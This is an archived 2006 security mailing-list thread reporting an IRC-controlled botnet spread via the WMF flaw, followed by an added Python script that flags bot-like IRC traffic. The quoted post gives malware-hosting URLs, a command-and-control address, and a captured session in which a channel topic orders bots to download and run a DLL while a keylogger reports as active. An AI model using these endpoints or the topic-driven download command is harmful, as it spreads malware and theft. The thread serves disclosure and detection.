Open Source and information security mailing list archives
Date: Fri Jan 20 13:58:12 2006
From: obnoxious at hush.com (obnoxious@...h.com)
Subject: Possible large botnet

I don't necessarily think whoever was infected was infected via viewing this site:

http://php.tjit.or.kr/ppp/log/sent.txt

Lists a slew of email addresses which whoever "could have" sent bogus messages to possibly infect (l)users.

On Fri, 20 Jan 2006 01:35:45 -0500 Pablo Esterban <pablo_esterban@...mail.com> wrote:
>Seems to be a botnet forming with the help of exploiting the recent wmf flaw
>on the following site. AFAIK malware/adware is referencing this.
>
>************D O N O T C L I C K************
>http://213.17.233.194/mediabar.wmf
>http://213.17.233.194/stat_s3.php
>http://213.17.233.194/stat.html
>************D O N O T C L I C K************
>
>This injects a trojan connecting to 219.240.142.59 on port 44234
>
>44234/tcp open irc Unreal ircd
>47292/tcp open irc Unreal ircd
>47296/tcp open irc Unreal ircd
>54729/tcp open irc-proxy psyBNC 2.3.1
>
>Channel stats list around 500 bots and around 1200 connected (may or may not
>be accurate), however if you poke around you will find
>http://219.240.142.59/usage/, containing some interesting links and info
>about when this most likely started.
>
>The tcp stream below demos the login, and calling of
>http://219.240.142.59/ppp/mediax.dll. Stats for January list close to 90k
>hits on this particular file(!).
>
>NICK *****
>USER plnaehe 0 0 :*****
>:irc.foonet.com NOTICE AUTH :*** Looking up your hostname...
>:irc.foonet.com NOTICE AUTH :*** Found your hostname
>:irc.foonet.com 001 *****:Welcome to the ROXnet IRC Network *****
>:irc.foonet.com 002 *****:Your host is irc.foonet.com, running version Unreal3.2.3
>:irc.foonet.com 003 *****:This server was created Thu Oct 13 2005 at 17:25:57 KST
>:irc.foonet.com 005 *****SAFELIST HCN MAXCHANNELS=10 CHANLIMIT=#:10 MAXLIST=b:60,e:60,I:60 NICKLEN=30 CHANNELLEN=32 TOPICLEN=307 KICKLEN=307 AWAYLEN=307 MAXTARGETS=20 WALLCHOPS WATCH=128 :are supported by this server
>:irc.foonet.com 005 *****SILENCE=15 MODES=12 CHANTYPES=# PREFIX=(ohv)@%+ CHANMODES=beIqa,kfL,lj,psmntirRcOAQKVGCuzNSMTG NETWORK=ROXnet CASEMAPPING=ascii EXTBAN=~,cqnr ELIST=MNUCT STATUSMSG=@%+ EXCEPTS INVEX CMDS=KNOCK,MAP,DCCALLOW,USERIP :are supported by this server
>:irc.foonet.com 251 *****:There are 1 users and 1194 invisible on 1 servers
>:irc.foonet.com 252 *****1 :operator(s) online
>:irc.foonet.com 253 *****201 :unknown connection(s)
>:irc.foonet.com 254 *****10 :channels formed
>:irc.foonet.com 255 *****:I have 1195 clients and 0 servers
>:irc.foonet.com 265 *****:Current Local Users: 1195 Max: 5529
>:irc.foonet.com 266 *****:Current Global Users: 1195 Max: 1276
>:irc.foonet.com 422 *****:MOTD File is missing
>*****MODE *****:+iwTxd
>USERHOST *****
>:irc.foonet.com 302 *****:*****
>MODE *****-x+B
>JOIN #mrbean5 rowan
>PRIVMSG *****:[KEYLOG]: Key logger active.
>USERHOST *****
>MODE *****-x+B
>JOIN #mrbean5 rowan
>USERHOST *****
>MODE *****-x+B
>JOIN #mrbean5 rowan
>:irc.foonet.com NOTICE *****:BOTMOTD File not found
>*****MODE *****:-x+B
>***** JOIN :#mrbean5
>:irc.foonet.com 332 *****#mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3
>:irc.foonet.com 333 *****#mrbean5 DDDI 1137401387
>:irc.foonet.com 353 *****@ #mrbean5 *****
>:irc.foonet.com 366 *****#mrbean5 :End of /NAMES list.
>*****PRIVMSG *****:[KEYLOG]: Key logger active.
>:irc.foonet.com 302 *****
>:irc.foonet.com 302 *****
>PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll.
>:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
>PRIVMSG #mrbean5 :[DOWNLOAD]: Downloaded 214.5 KB to C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll @ 71.5 KB/sec.
>PRIVMSG #mrbean5 :[DOWNLOAD]: Opened: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\\mediax.dll.
>:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
>:irc.foonet.com 404 *****#mrbean5 :You need voice (+v) (#mrbean5)
>
>_______________________________________________
>Full-Disclosure - We believe in it.
>Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>Hosted and sponsored by Secunia - http://secunia.com/
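The quoted stream gives a defender three things to key on: a channel topic (numeric 332) that carries a dot-command plus a download URL, bot status reports with bracketed tags like [KEYLOG] and [DOWNLOAD], and a LUSERS reply (251) where nearly every connection is invisible. The following Python is an added example, not code from the post, that scans IRC protocol lines for those patterns; the sample lines are constructed from the stream above, with "botnick" as a placeholder for the redacted nick.

```python
import re

# Constructed sample IRC lines modelled on the post's stream ("botnick" is a placeholder nick).
SAMPLE_STREAM = [
    ":irc.foonet.com 001 botnick :Welcome to the ROXnet IRC Network botnick",
    ":irc.foonet.com 251 botnick :There are 1 users and 1194 invisible on 1 servers",
    "JOIN #mrbean5 rowan",
    "PRIVMSG botnick :[KEYLOG]: Key logger active.",
    ":irc.foonet.com 332 botnick #mrbean5 :.wipe http://219.240.142.59/ppp/mediax.dll mediax.dll 3",
    "PRIVMSG #mrbean5 :[DOWNLOAD]: Downloading URL: http://219.240.142.59/ppp/mediax.dll to: mediax.dll.",
    ":irc.foonet.com 366 botnick #mrbean5 :End of /NAMES list.",
]

URL_RE = re.compile(r"https?://\S+")
STATUS_RE = re.compile(r"^\[[A-Z]+\]:")  # "[KEYLOG]: ...", "[DOWNLOAD]: ..."
LUSERS_RE = re.compile(r"There are (\d+) users and (\d+) invisible")

def parse_irc_line(line):
    """Split one IRC line into (prefix, command, params, trailing)."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    return prefix, parts[0], parts[1:], (trailing if sep else None)

def scan_irc_stream(lines, invisible_ratio=10):
    """Return (rule, line) findings for the bot-like patterns seen in the post."""
    findings = []
    for line in lines:
        if not line.strip():
            continue
        _, command, _, trailing = parse_irc_line(line)
        if command == "332" and trailing and trailing.startswith(".") and URL_RE.search(trailing):
            # 332 is the channel topic; a dot-command plus a URL in it is the topic-driven download.
            findings.append(("topic-command-with-url", line))
        elif command == "PRIVMSG" and trailing and STATUS_RE.match(trailing):
            # Bots report status with bracketed tags such as [KEYLOG] / [DOWNLOAD].
            findings.append(("bot-status-report", line))
        elif command == "251" and trailing:
            m = LUSERS_RE.search(trailing)
            if m and int(m.group(2)) >= invisible_ratio * max(int(m.group(1)), 1):
                # Almost every user invisible (+i) on one server is typical of a bot herd.
                findings.append(("mass-invisible-users", line))
    return findings

if __name__ == "__main__":
    for rule, line in scan_irc_stream(SAMPLE_STREAM):
        print(rule, "->", line)
```

Fed a decoded IRC session from a capture or proxy log, the same scanner flags each of the three patterns the post's stream exhibits.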